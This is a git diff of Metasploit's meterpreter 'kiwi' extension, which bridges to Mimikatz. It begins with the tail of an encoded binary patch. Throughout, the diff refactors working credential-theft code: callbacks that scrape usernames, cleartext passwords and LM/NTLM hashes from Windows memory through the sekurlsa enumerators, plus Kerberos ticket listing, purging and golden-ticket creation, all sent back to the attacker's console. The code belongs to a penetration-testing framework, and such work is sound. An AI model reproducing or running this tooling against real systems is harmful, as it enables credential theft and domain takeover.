zmXH$%d(#K6UCMYi<KJeC9c$*tGHx0ti@Od=iHCkzC=BU)w2C+lt22x*oH!0c`agBf
zB|w9*aC63oZA-bQxLkoT4Q244-^Tw{1Gc<<481ksP@b?J9VZ0gTbDqzHTHlRW7$T-
zyo6QAK4EttxJJF6{&L1ot>{ZPDvE{v1^R5r??CcybtV@5C(MNYqV>?8Fauh1mP2E#
z53KhbfKfK(LceIwq!>7sGS7iA-U*Bcc`+U|<yIBu{ZNNxT<d?k@HF#F7|$KK5bdm|
z!^Fj_z2UIQ!ZP8gu!%lgt9^yJIBeg%l=&8A)N|^bc6vPeha7=Uz*3k6?SRdWW3srE
z_SVA~5VRXsTMnb&q?yp%y9avoM-5_ZYRLHu@Te-sIPObk+^k`2vj&@fX~eLsN_;bF
zCAv=8##q#Jn2qt*HF66O4oSy_b6m&`^(%}ul|(Uy5YP6L8T&|u?m70u;REPDZ64!(
z>!7zi6yx(QVf^`8xaF3^D4el;zh%%|v=X}XM{Ba5v{DmbK|jUNvI5djhN;Y(TKc#S
z!GC=Qn}|HL^4N@)%tx~tJ7bjj7(X%o>?tuRA^c+Z>S)F+Vqn2s0>k21>RTjp0gl1$
zNC?d6U+Xz#862W>5c%XC<8(jaBz??!p~>hqV>x|;o1i&00E14QhG|*~)S1^|O?{Y5
zT?n{dgSmIFVCB<#Bs0ElzAA*Vh*{8a@>$g1X{vDD5+p{iT^_7`Jq<(XHy%R&y{VLg
zL0_^-Oc*RyZGyh<BIv9;ie(kI5JO*gEMq=dPk+UR%Xgu9Bnn!GBGJ{%h4GOk&^!}H
zeV`wju{9|!HM@avS@y%ihYbk-?K$Qp<wDMU8oF9eSlz{Hl30J@sMvA%kj=oWY0P6{
z43KeTd&XZ4&&NP7IUFV-%#m2O9s^b%!0e){h`#p|ebYb6;!WwKVf*bLV3L#rW5&Y`
z7{?#LJPIi`W0b=jt`d$1#_8wMFR+?^^-ZrDk?`|#bQ!%2-5dkf^>7Uo`}YKk6Fc?@
zi>&a!8rLN=jziGKI@A8@o{N#iEetnpMK8Y~I42cS_CL#FT$zj&rI40{CqH9odI3z1
zMnQY#5{}VO3`mHAHDfDw7wN~oQi;X48@P|ZfsNb~Co`5Zm9ewd24iP*vhWhSckLDj
zcJ3C#7tixIxI@1SZQum@?OkbWO_(pGl^hM-gNL9Y#Xe4FB7}Z=DL#_ISZ(^lpOHcT
z_T17swi^!<#?&qNtQqytkg<hPWyJ`*R*$ueN$up`b`SUG3Dkijr5p==oy;YFUTR{p
zNJ~r+g$b!*WM2Gzi@Tgt7&{nqnf9bSi!tOxXoMd_zp>uvw`v!h(@PLR-p`VTG>Hb5
z@r*l-JXZv>HM?LzpQ%3MlV;3snZVd;;Porm`B;hx++{4|J`#U>jnKM!G*fp~YiHsq
zlHw9%$V@sb0{r|{P4Z5|`CcJ&Typ9AXDq#d_LlL-fonIQ=g@KJx;hvx5ow5i^fS`Q
zdotr(;Sb+n%sI}LYxclm#TFPZ3W8l;2F6wvVAZ{=GM~QWTMMCoHiq)wQ&jp_$rs*|
z{@9Q0pG!#<GXev}+Mv}vof`7s_MimguNJ_eCKpzPj6pHyK<mg+^qV{f-R7->M^-7;
z*4@Xb4CaF*(C@b|92z6N;J9foMuddHn||hbj3=+9uj~l<j-b!uFxyY({$bSGgJI3p
zT}2E1vA=77`ho>w#ios7{*uM|j?8)UcvuO)TNUuSQU+7TNp)yzHCF{ef9?tlTECz1
z-~$-MK6jwZ2M5wd1}udA_I(&lAMcz7`bXLJUiSG(`ijEoD>}p6l#riZpoNiV*Y3{#
zqQ~%nui9U}b(5GCv_hnv%hdI}Rf>sEF2RfWQtq{-w8=Tp;{0cwkqVp5yD@0VdfKK9
zaAa)WX6trLI+upY9CLp3&2D&jmHw!^^oL8npZhpN|4AnP4u^x$Ip3OjiO%-ZWcX74
z68}>BGghw<vANkIJT$D&l*>iGPJBWCSmR~tWElpWPlt6W*B$h^+7-}e%+i%~xtB9m
z!MvhC`ZYH_zWzRzAjzHnvFJBXk%o6zbg2%;%Y#*Iw;U68+fK;vU$q~Tmm@;XoEB#e
z9BLYn9DCk_IT_;~H((0m6)wypn{>4XV>ri*WbDO@$MYNOnfp*rUmbnvGT-83gfR{i
zLEl{XyVr<&(0J2q!=V-yYYqx4`V>FnAGLoZ@{9;S8X{(9r-+qXw|e<ERQx62%>&GR
zb016SV_Q!D;1b%E4U9ePes&ML8FvV#|2{;D{rvb0$KSoAU;GKOuht)|DmX99x1SJ}
zYY%;DTcY8gY2Pn5RV)tPBQj1!iml<{{!7aXA8ux!?)l{zbLXC85B-0Kete1(zrMf`
z#tecf?~up$5LZ(jQ(02nBje_EQBhRzZ?(U0Z?H&-ju9J~w>c+ZzSyw;P>+pqF|#(G
zO-<TWR$O)BMs4NMlERA-nHdMO3JOQ%oK0yGRd+>{(KnQS`^JB+{iJv?XVDU|@%Ra`
zDK$xK&dL<Ks>{WR+jZh-MTrQ{&k-3VB_cB;T}0N`{kQGQ+zG$Qfo_NHbV0}ylKVlP
z{*3N)O?0Q5qGcn`^Lbsu>i1~E@+<Iu6A6v)A;)*+Sce?zlIoRby)Eh1u%vG&2!CrL
zYkCGZdul@RcSzr(NxQzU{TOt0$e#H}ehejkPxK{}C0~J}1o>7h)wmzl=ic3f*ZEC=
z<S+QV2bK1Nbb|<aHs743f_yW+*Q~pWl6-(ts}6}u?Rpj|wdq`|tlFC2NPKfqxp|XV
z)+>Em#P5$(xUW|co<96Kwbx+bvSf#7Ehoo)Y>Pb6QXfq^+vA%a&XCs{&HXC(sQjix
zxl@0rv~2T(f}9wqpwL`ZK|x-O@$lt_cc5^Zx>R(v7+2S6=@uAp4joJz(|6BFwD(zy
z=9aU#*PICz?(3BG$3k7t!jfA``gepF!@ZqQ)f9arL;r5vSct)os$qIPALh)zwt38)
z)0fq7;aafksuSF!1#+Lb5G~ET!F;s#u9N4B;X~a;@8i3#>D*_IZZY!>m>;G^TW5TM
z=iFnMaxQkcS%ir%8Za`y7+q%ubC0zU-ON314jVtc*^-bWZo1dfF}Nau`;tT$Br%^e
zXfxM_tGWK)1P!huj5vpkzg$WC(SXH_wW=`pxRuQe3>Z4ee)68pe(Lp!j0Z9Ajd{%)
zYt}<|W)K`sbHB%Yus+kd24>!lX?`xoa7`8T_7)}-U4o+HA{dYGn>uI9#^HK(%)zPQ
z{((7}ri<4zhI$6MKLa6+uh4z%K4^IRqhC@qV@rjY&A3b`nB%tMAlev?TeC4}jhs1i
zABQzCm#UEYqC2+3e9sxAKL;va0SoFMpzoqh&^dVw76rNRsjtSacaO2Qq!K;s{Fbg>
zzh2CZ3tM4xpRwx8=b;{R5<PquW5boFsC*4%5_ZgW(B)drl5$va=NgXDZY6MD>hC&h
z?8a4V#J0sNgj@Xab0eOXQw}-k%V)bxTY`<XcV%l`%MAx$Ixh$w6@|<%xy7~AYwW*y
z{jcrKCbiqJdac;7a<w?RVT%Z?%rEqOew}$3CD1r}7~0GO)LXa;*6TN84D)|CJ-LAs
zuO4td1gwMhuIXexNl5RnTeVsQZ`~%c&cujSY4N)~nZxDCd^Fd~%$sG5ZYJlLEiW2L
z_xFhX`x|VpzLaCJ;h1pR8~N$|-P^W{H0FjZ&Pfs5ckdp!roN(L1Lwh=d?)0WADEBy
z3}KJ&KCija5U~Bq6=AU<L=0t|>tp*L-(Qq>R%|+aNbKCcQ>;62(rClE%)>{kD`KOv
zGAHL`WvNs&-Voca)O~vYZ}OFR)ufuZf=0O~$ZxWRCT$H(&Xjr~rjHR~CqGJx<+T`^
zpjb3ENyRI<B)pT~gWp;<ovZu7#sDp7ho<t3-@$(IU92?9<b*CCldO>R6)j7(4`(z`
z-_ZN|{!FrHa>9l0_a;7nuV2D5>DyXG>C+zBug8bKi~R!T`v&UFkOuPD(OzTiM~!wI
z?&{^}I%K%e6K#ZWw6paZ?Pl%fXe-pU^)&dYwD|b0xK9>8{4!YnzRgnEoiE#z8D0KS
zY-%e^h3AJa=BLZP8TJ=ypS~*&<gq%xh&JZ;-5Pw(h2IfN-=ojrcg1t~#qk2(AI&e4
zhw<F=58s}9@~dSdelxEpta(rR273y>MPA5nr+s-YeGwnPnxrq>b@=79Wc%OCT(Rlb
zUu8?J(z5c6Kk`=g6>oZj*yJAt`0xIQ2u&$cK+izvNu4jF0+24TFPr?4ruRMjrM&I<
zhJ??0z?Wpd&);0<bKZ&MHQ>+x&jm@_HaGn^N4|gmOJBbf3mC!wRN?&``ksa_?@Jol
z!R+Jxujg2auTV?r{-5i<q{~0@{%0OO>#~d${*iQVhSitPeAc~>&q#e}XZ__fpZoCR
GGye<5N5dTe
literal 0
HcmV?d00001
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.c b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.c
index ff439796..63054958 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.c
@@ -6,10 +6,6 @@
#include "mimikatz.h"
#include "mimikatz_interface.h"
-static wchar_t* output = NULL;
-static DWORD outputLen = 0;
-static DWORD outputSize = 0;
-
const KUHL_M * mimikatz_modules[] = {
//&kuhl_m_standard,
&kuhl_m_crypto,
@@ -27,7 +23,10 @@ const KUHL_M * mimikatz_modules[] = {
&kuhl_m_vault,
};
-DWORD mimikatz_doLocal(wchar_t * input);
+#ifdef DEBUGTRACE
+static wchar_t* output = NULL;
+static DWORD outputLen = 0;
+static DWORD outputSize = 0;
const wchar_t* mimikatz_get_output()
{
@@ -49,8 +48,8 @@ void mimikatz_append_output(const wchar_t* newOutput)
{
outputLen += lstrlenW(newOutput) + 1;
- dprintf(L"[MIMIKATZ] appending: %s", newOutput);
- dprintf(L"[MIMIKATZ] outputSize %u outputLen %u", outputSize, outputLen);
+ dprintf(L"[KIWI] appending: %s", newOutput);
+ dprintf(L"[KIWI] outputSize %u outputLen %u", outputSize, outputLen);
if (outputSize == 0)
{
@@ -67,13 +66,7 @@ void mimikatz_append_output(const wchar_t* newOutput)
lstrcatW(output, newOutput);
}
-
-
-BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
-{
- mimikatz_initOrClean(FALSE);
- return FALSE;
-}
+#endif
VOID (WINAPI * RtlGetNtVersionNumbers)(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
@@ -87,7 +80,7 @@ VOID setup_function_pointers()
kull_m_handle_initialise();
}
-DWORD mimikatz_initOrClean(BOOL Init)
+DWORD mimikatz_init_or_clean(BOOL Init)
{
unsigned short indexModule;
PKUHL_M_C_FUNC_INIT function;
@@ -96,19 +89,21 @@ DWORD mimikatz_initOrClean(BOOL Init)
if (Init)
{
- dprintf(L"[MIMIKATZ] initorclean - setting up function pointers");
+ dprintf(L"[KIWI] initorclean - setting up function pointers");
setup_function_pointers();
- dprintf(L"[MIMIKATZ] initorclean - set writer");
+#ifdef DEBUGTRACE
+ dprintf(L"[KIWI] initorclean - set writer");
kull_m_output_set_writer(mimikatz_append_output);
+#endif
if (RtlGetNtVersionNumbers != NULL)
{
- dprintf(L"[MIMIKATZ] initorclean - GetNTVersion");
+ dprintf(L"[KIWI] initorclean - GetNTVersion");
RtlGetNtVersionNumbers(&MIMIKATZ_NT_MAJOR_VERSION, &MIMIKATZ_NT_MINOR_VERSION, &MIMIKATZ_NT_BUILD_NUMBER);
}
else
{
- dprintf(L"[MIMIKATZ] Defaulting to Win2k");
+ dprintf(L"[KIWI] Defaulting to Win2k");
// default to Windows 2000
MIMIKATZ_NT_MAJOR_VERSION = 5;
MIMIKATZ_NT_MINOR_VERSION = 0;
@@ -116,14 +111,14 @@ DWORD mimikatz_initOrClean(BOOL Init)
}
MIMIKATZ_NT_BUILD_NUMBER &= 0x00003fff;
- dprintf(L"[MIMIKATZ] initorclean - Versions: %u %u %u", MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NUMBER);
+ dprintf(L"[KIWI] initorclean - Versions: %u %u %u", MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NUMBER);
offsetToFunc = FIELD_OFFSET(KUHL_M, pInit);
- dprintf(L"[MIMIKATZ] initorclean - init done");
+ dprintf(L"[KIWI] initorclean - init done");
}
else
{
- dprintf(L"[MIMIKATZ] initorclean - tearing down up");
+ dprintf(L"[KIWI] initorclean - tearing down up");
offsetToFunc = FIELD_OFFSET(KUHL_M, pClean);
kull_m_output_set_writer(NULL);
@@ -133,11 +128,11 @@ DWORD mimikatz_initOrClean(BOOL Init)
{
if (function = *(PKUHL_M_C_FUNC_INIT *)((ULONG_PTR)(mimikatz_modules[indexModule]) + offsetToFunc))
{
- dprintf(L"[MIMIKATZ] initorclean - setting up module %s", mimikatz_modules[indexModule]->shortName);
+ dprintf(L"[KIWI] initorclean - setting up module %s", mimikatz_modules[indexModule]->shortName);
fStatus = function();
if (!NT_SUCCESS(fStatus))
kprintf(L">>> %s of \'%s\' module failed : %08x\n", (Init ? L"INIT" : L"CLEAN"), mimikatz_modules[indexModule]->shortName, fStatus);
- dprintf(L"[MIMIKATZ] initorclean - %s done", mimikatz_modules[indexModule]->shortName);
+ dprintf(L"[KIWI] initorclean - %s done", mimikatz_modules[indexModule]->shortName);
}
}
@@ -146,136 +141,3 @@ DWORD mimikatz_initOrClean(BOOL Init)
return (DWORD)STATUS_SUCCESS;
}
-
-DWORD mimikatz_dispatchCommand(wchar_t * input)
-{
- NTSTATUS status;
-
- dprintf(L"[MIMIKATZ] Dispatching command: %s", input);
-
- switch (input[0])
- {
- /*case L'@':
- case L'*':
- status = mimikatz_doRemote(input + 1);
- break;*/
- case L'!':
- status = kuhl_m_kernel_do(input + 1);
- break;
- default:
- status = mimikatz_doLocal(input);
- }
- return (DWORD)status;
-}
-
-DWORD mimikatz_doLocal(wchar_t * input)
-{
- NTSTATUS status = STATUS_SUCCESS;
- int argc;
- wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
- unsigned short indexModule, indexCommand;
- BOOL moduleFound = FALSE, commandFound = FALSE;
-
- dprintf(L"[MIMIKATZ] doing local: %s", input);
-
- if (argv && (argc > 0))
- {
- if (match = wcsstr(argv[0], L"::"))
- {
- dprintf(L"[MIMIKATZ] match: %s", match);
- if (module = (wchar_t *)LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
- {
- if ((unsigned int)(match + 2 - argv[0]) < wcslen(argv[0]))
- {
- command = match + 2;
- }
- RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
- dprintf(L"[MIMIKATZ] module: %s", module);
- }
- }
- else
- {
- command = argv[0];
- }
- dprintf(L"[MIMIKATZ] command: %s", command);
-
- for (indexModule = 0; !moduleFound && (indexModule < sizeof(mimikatz_modules) / sizeof(KUHL_M *)); indexModule++)
- {
- moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0));
- dprintf(L"[MIMIKATZ] Checking '%s' against '%s' -> %s", module, mimikatz_modules[indexModule]->shortName, moduleFound ? L"FOUND" : L"not found");
-
- if (!moduleFound)
- {
- continue;
- }
-
- if (!command)
- {
- continue;
- }
-
- dprintf(L"[MIMIKATZ] Checking '%s' against %d commands for '%s'", command, mimikatz_modules[indexModule]->nbCommands, module);
- for (indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)
- {
- dprintf(L"[MIMIKATZ] Checking '%s' against '%s'", command, mimikatz_modules[indexModule]->commands[indexCommand].command);
- commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0;
- if (!commandFound)
- {
- dprintf(L"[MIMIKATZ] '%s' not found", command);
- continue;
- }
-
- dprintf(L"[MIMIKATZ] '%s' FOUND. Executing", command);
- status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);
- }
- }
-
- if (!moduleFound)
- {
- dprintf(L"[MIMIKATZ] \"%s\" module not found !", module);
- for (indexModule = 0; indexModule < sizeof(mimikatz_modules) / sizeof(KUHL_M *); indexModule++)
- {
- kprintf(L"\n%16s", mimikatz_modules[indexModule]->shortName);
- if (mimikatz_modules[indexModule]->fullName)
- {
- kprintf(L" - %s", mimikatz_modules[indexModule]->fullName);
- }
- if (mimikatz_modules[indexModule]->description)
- {
- kprintf(L" [%s]", mimikatz_modules[indexModule]->description);
- }
- }
- kprintf(L"\n");
- }
- else if (!commandFound)
- {
- indexModule -= 1;
- dprintf(L"[MIMKATZ] \"%s\" command of \"%s\" module not found !", command, mimikatz_modules[indexModule]->shortName);
-
- kprintf(L"\nModule :\t%s", mimikatz_modules[indexModule]->shortName);
- if (mimikatz_modules[indexModule]->fullName)
- {
- kprintf(L"\nFull name :\t%s", mimikatz_modules[indexModule]->fullName);
- }
- if (mimikatz_modules[indexModule]->description)
- {
- kprintf(L"\nDescription :\t%s", mimikatz_modules[indexModule]->description);
- }
- kprintf(L"\n");
-
- for (indexCommand = 0; indexCommand < mimikatz_modules[indexModule]->nbCommands; indexCommand++)
- {
- kprintf(L"\n%16s", mimikatz_modules[indexModule]->commands[indexCommand].command);
- if (mimikatz_modules[indexModule]->commands[indexCommand].description)
- {
- kprintf(L" - %s", mimikatz_modules[indexModule]->commands[indexCommand].description);
- }
- }
- kprintf(L"\n");
- }
-
- LocalFree(module);
- LocalFree(argv);
- }
- return (DWORD)status;
-}
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.h b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.h
index 919b5a4e..001080a8 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz.h
@@ -28,6 +28,4 @@
extern VOID (WINAPI * RtlGetNtVersionNumbers)(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
-BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
-
#include "../debug.h"
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c
index 02d62f0c..623eaab0 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c
@@ -1,22 +1,37 @@
+/*!
+ * @file mimikatz_interface.c
+ * @brief Definition of bridging functions which talk to Mimikatz 2.
+ */
#include "main.h"
#include "mimikatz_interface.h"
#include <NTSecAPI.h>
-// dirty hackes to get things to build
-// copied from crypto_system
+// The following values have been copied from source files because including those files here results in a nasty
+// set of errors thanks to macro redefinitions and such. It's horrible, but it builds cleanly. These things are
+// not likely to change anyway.
+
+// Values copied from crypto_system
#define MD4_DIGEST_LENGTH 16
#define MD5_DIGEST_LENGTH 16
#define SHA_DIGEST_LENGTH 20
-// copied from globals
+
+// Values copied from globals
#define LM_NTLM_HASH_LENGTH 16
#define TIME_SIZE 28
+// These includes were created to provide a bridge between the Mimikatz code and meterpreter. Without this
+// kind of approach we end up doing what we had to do with the old mimikatz and serialise things to CSV
+// strings before passing them back to Metasploit. I wanted to avoid this hence instead I'm tapping into
+// Mimikatz via callback functions.
#include "modules\kuhl_m_lsadump_struct.h"
#include "modules\kerberos\khul_m_kerberos_struct.h"
typedef void (CALLBACK * PKUHL_M_SEKURLSA_EXTERNAL) (IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain, IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData);
typedef LONG (* PKUHL_M_SEKURLSA_ENUMERATOR)(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state);
+// The functions listed here exist elsewhere in the application. Header files are not included
+// due to collisions in include files which result in nasty build errors. The result of these
+// functions is actually NTSTATUS, but defining it here via header inclusion isn't possible.
extern LONG kuhl_m_sekurlsa_all_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state);
extern LONG kuhl_m_sekurlsa_wdigest_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state);
extern LONG kuhl_m_sekurlsa_msv_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state);
@@ -30,6 +45,12 @@ extern LONG kuhl_m_kerberos_use_ticket(PBYTE fileData, DWORD fileSize);
extern LONG kuhl_m_kerberos_create_golden_ticket(PCWCHAR szUser, PCWCHAR szDomain, PCWCHAR szSid, PCWCHAR szNtlm, PBYTE* ticketBuffer, DWORD* ticketBufferSize);
extern LONG kuhl_m_kerberos_purge_ticket();
+/*!
+ * @brief Attempt to determine if the given string is a valid Unicode string.
+ * @param dwBytes The number of bytes in the given secret value.
+ * @param pSecret Pointer to the byte sequence representing the secret value.
+ * @returns Indication of whether the value is a proper unicode string.
+ */
BOOL is_unicode_string(DWORD dwBytes, LPVOID pSecret)
{
UNICODE_STRING candidateString = { (USHORT)dwBytes, (USHORT)dwBytes, (PWSTR)pSecret };
@@ -37,7 +58,18 @@ BOOL is_unicode_string(DWORD dwBytes, LPVOID pSecret)
return pSecret && IsTextUnicode(candidateString.Buffer, candidateString.Length, &unicodeTestFlags);
}
-void CALLBACK handle_result(IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain,
+/*!
+ * @brief Callback function that handles a password enumeration result.
+ * @param luid The locally unique identifier for this credential entry.
+ * @param username The name of the user for this credential.
+ * @param domain The active domain for this credential.
+ * @param password The clear-text password for this credential.
+ * @param lm Pointer to the LM hash.
+ * @param ntlm Pointer to the NTLM hash.
+ * @param pvData Pointer to context-data for this callback. In this case it contains
+ * a pointer to the current Packet to add the entry to.
+ */
+void CALLBACK credential_result_handler(IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain,
IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData)
{
UINT hi = 0;
@@ -53,19 +85,19 @@ void CALLBACK handle_result(IN CONST PLUID luid, IN CONST PUNICODE_STRING userna
if (username != NULL && username->Buffer != NULL && username->Length > 0)
{
dprintf("[KIWI] Adding username %u chars", username->Length);
- lpUserName = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_USERNAME, username->Buffer, username->Length);
+ lpUserName = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_USERNAME, username->Buffer, username->Length / sizeof(wchar_t));
}
if (domain != NULL && domain->Buffer != NULL && domain->Length > 0)
{
dprintf("[KIWI] Adding domain %u chars", domain->Length);
- lpDomain = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_DOMAIN, domain->Buffer, domain->Length);
+ lpDomain = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_DOMAIN, domain->Buffer, domain->Length / sizeof(wchar_t));
}
if (password != NULL && password->Buffer != NULL && password->Length > 0)
{
dprintf("[KIWI] Adding password %u chars", password->Length);
- lpPassword = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_PASSWORD, password->Buffer, password->Length);
+ lpPassword = packet_add_tlv_wstring_entry(&entries[count++], TLV_TYPE_KIWI_PWD_PASSWORD, password->Buffer, password->Length / sizeof(wchar_t));
}
dprintf("[KIWI] Adding auth info");
@@ -105,11 +137,19 @@ void CALLBACK handle_result(IN CONST PLUID luid, IN CONST PUNICODE_STRING userna
++count;
}
- dprintf("[KIWI] Adding to packet");
- packet_add_tlv_group(packet, TLV_TYPE_KIWI_PWD_RESULT, entries, count);
+ // don't add this value to the packet unless we have a username, because it's pointless
+ // otherwise and just adds noise/overhead to the comms
+ if (lpUserName && lstrlenA(lpUserName) > 0)
+ {
+ dprintf("[KIWI] Adding to packet");
+ packet_add_tlv_group(packet, TLV_TYPE_KIWI_PWD_RESULT, entries, count);
+ }
+ else
+ {
+ dprintf("[KIWI] Ignoring result due to lack of username");
+ }
-
- if (lpUserName != NULL)
+ if (lpUserName)
{
free(lpUserName);
}
@@ -125,60 +165,68 @@ void CALLBACK handle_result(IN CONST PLUID luid, IN CONST PUNICODE_STRING userna
}
}
-DWORD mimikatz_scrape_passwords(DWORD cmdId, Packet* packet)
+/*!
+ * @brief Scrape credentials from memory.
+ * @param dwCmdId ID of the "command" which indicates which type of credential to steal.
+ * @param pResponse Pointer to the packet to add the results to.
+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_scrape_passwords(DWORD dwCmdId, Packet* pResponse)
{
- switch (cmdId)
+ switch (dwCmdId)
{
case KIWI_PWD_ID_SEK_ALLPASS:
{
dprintf("[KIWI] running all pass");
- return kuhl_m_sekurlsa_all_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_all_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_WDIGEST:
{
dprintf("[KIWI] running wdigest");
- return kuhl_m_sekurlsa_wdigest_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_wdigest_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_MSV:
{
dprintf("[KIWI] running msv");
- return kuhl_m_sekurlsa_msv_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_msv_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_KERBEROS:
{
dprintf("[KIWI] running kerberos");
- return kuhl_m_sekurlsa_kerberos_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_kerberos_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_TSPKG:
{
dprintf("[KIWI] running tspkg");
- return kuhl_m_sekurlsa_tspkg_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_tspkg_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_LIVESSP:
{
dprintf("[KIWI] running livessp");
- return kuhl_m_sekurlsa_livessp_enum(handle_result, packet);
+ return kuhl_m_sekurlsa_livessp_enum(credential_result_handler, pResponse);
}
case KIWI_PWD_ID_SEK_SSP:
{
dprintf("[KIWI] running ssp");
- return kuhl_m_sekurlsa_ssp_enum(handle_result, packet);
- }
- case KIWI_PWD_ID_SEK_TICKETS:
- {
- dprintf("[KIWI] running tickets");
- break;
- }
- case KIWI_PWD_ID_SEK_DPAPI:
- {
- dprintf("[KIWI] running dpapi");
- break;
+ return kuhl_m_sekurlsa_ssp_enum(credential_result_handler, pResponse);
}
+ // TODO: Enable this function soon
+ //case KIWI_PWD_ID_SEK_DPAPI:
+ //{
+ // dprintf("[KIWI] running dpapi");
+ // break;
+ //}
}
return ERROR_INVALID_PARAMETER;
}
+/*!
+ * @brief Helper function that converts an ASCII string to a wchar_t string.
+ * @param ascii The ASCII version of the string.
+ * @returns An allocated buffer with the convert string in it.
+ * @remark If the return result is non-NULL then it needs to be released using \c free().
+ */
wchar_t* ascii_to_wide_string(char* ascii)
{
size_t requiredChars = strlen(ascii) + 1;
@@ -191,6 +239,11 @@ wchar_t* ascii_to_wide_string(char* ascii)
return buffer;
}
+/*!
+ * @brief Helper function that converts a LARGE_INTEGER time value to a string.
+ * @param time The value of the time to conver to string.
+ * @param output Buffer that will contain the resulting string.
+ */
VOID to_system_time_string(LARGE_INTEGER time, char output[TIME_SIZE])
{
SYSTEMTIME st;
@@ -203,7 +256,13 @@ VOID to_system_time_string(LARGE_INTEGER time, char output[TIME_SIZE])
st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond, st.wMilliseconds);
}
-VOID TicketHandler(LPVOID lpContext, PKERB_TICKET_CACHE_INFO_EX pKerbTicketInfo, PKERB_EXTERNAL_TICKET pExternalTicket)
+/*!
+ * @brief Callback for handling kerberos tickets that are found and are to be returned to Metasploit.
+ * @param lpContext Pointer to the associated enumeration context, in this case it's a Packet*.
+ * @param pKerbTicketInfo Pointer to the kerberos ticket information structure that was found.
+ * @param pExternalTicket Pointer to the external ticket that contains the raw bytes of the ticket that was found.
+ */
+VOID kerberos_ticket_handler(LPVOID lpContext, PKERB_TICKET_CACHE_INFO_EX pKerbTicketInfo, PKERB_EXTERNAL_TICKET pExternalTicket)
{
Packet* packet = (Packet*)lpContext;
@@ -290,75 +349,105 @@ VOID TicketHandler(LPVOID lpContext, PKERB_TICKET_CACHE_INFO_EX pKerbTicketInfo,
}
}
-DWORD mimikatz_kerberos_ticket_list(BOOL bExport, Packet* response)
+/*!
+ * @brief Enumerate all kerberos tickets.
+ * @param bExport Indicates whether the raw tickets should be exported or not.
+ * @param pResponse Pointer to the packet which the results shoudl be added to.
+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_kerberos_ticket_list(BOOL bExport, Packet* pResponse)
{
KERB_CALLBACK_CTX callbackCtx;
- callbackCtx.lpContext = response;
- callbackCtx.pTicketHandler = TicketHandler;
+ callbackCtx.lpContext = pResponse;
+ callbackCtx.pTicketHandler = kerberos_ticket_handler;
return kuhl_m_kerberos_list_tickets(&callbackCtx, bExport);
}
+/*!
+ * @brief Purge all applied kerberos tickets.
+ * @returns Indication of success or failure.
+ */
DWORD mimikatz_kerberos_ticket_purge()
{
return kuhl_m_kerberos_purge_ticket();
}
-DWORD mimikatz_kerberos_golden_ticket_create(char* user, char* domain, char* sid, char* tgt, Packet* response)
+/*!
+ * @brief Create a golden kerberos ticket which lasts for 10 years (apparently).
+ * @param lpUser Name of the user to create the ticket for.
+ * @param lpDomain Name of the domain the ticket should apply to.
+ * @param lpSid The Domain SID.
+ * @param lpTgt The ticket granting token.
+ * @param pResponse Pointer to the packet which the results should be added to.
